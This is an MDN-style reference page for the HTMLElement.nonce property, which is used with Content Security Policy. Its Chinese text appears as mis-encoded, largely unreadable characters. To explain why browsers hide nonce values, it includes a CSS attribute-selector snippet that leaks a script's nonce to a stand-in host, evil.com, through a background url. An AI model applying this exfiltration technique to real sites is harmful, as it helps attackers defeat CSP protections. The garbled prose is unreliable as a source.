HTMLElement.nonce
Baseline
Widely available
This feature is well established and works across many devices and browser versions. Itâs been available across browsers since â¨2022å¹´3æâ©.
HTMLElement æ¥å£ç nonce 屿§è¿ååªä½¿ç¨ä¸æ¬¡çå 坿°åï¼è¢«å
容å®å
¨æ¿çç¨æ¥å³å®è¿æ¬¡è¯·æ±æ¯å¦è¢«å
许å¤çã
卿¥ä¸æ¥çå®ç°ä¸ï¼æ nonce 屿§çå ç´ åªè½å¨èæ¬ä¸ä½¿ç¨ï¼ä¸å¯ä»¥å¨å ¶ä»æ¸ é使ç¨ï¼æ¯å¦ css 屿§éæ©å¨ï¼ã
示ä¾
>è®¿é® nonce 屿§å¼
以åï¼å¹¶ä¸æ¯ææçæµè§å¨é½æ¯æ nonce IDL 屿§ï¼å æ¤å¨å®é
åºç¨åºæ¯ä¸ï¼å°è¯ä½¿ç¨ getAttribute ä½ä¸ºå¤éï¼
let nonce = script["nonce"] || script.getAttribute("nonce");
ç¶èï¼ææ°çæµè§å¨çæ¬é½éèäº nonce å¼ï¼è¿åä¸ä¸ªç©ºå¼ï¼ãIDL 屿§ï¼script['nonce']ï¼æä¸ºå¯ä¸çè®¿é®æ¹å¼ã
éè Nonce æ¯ä¸ºäºé»æ¢æ»å»è éè¿æç§æºå¶æååº nonce å¼ï¼æ¯å¦ä¸é¢è¿ç§æ¹å¼ï¼
script[nonce~="whatever"] {
background: url("https://evil.com/nonce?whatever");
}
è§è
| Specification |
|---|
| HTML > # dom-noncedelement-nonce > |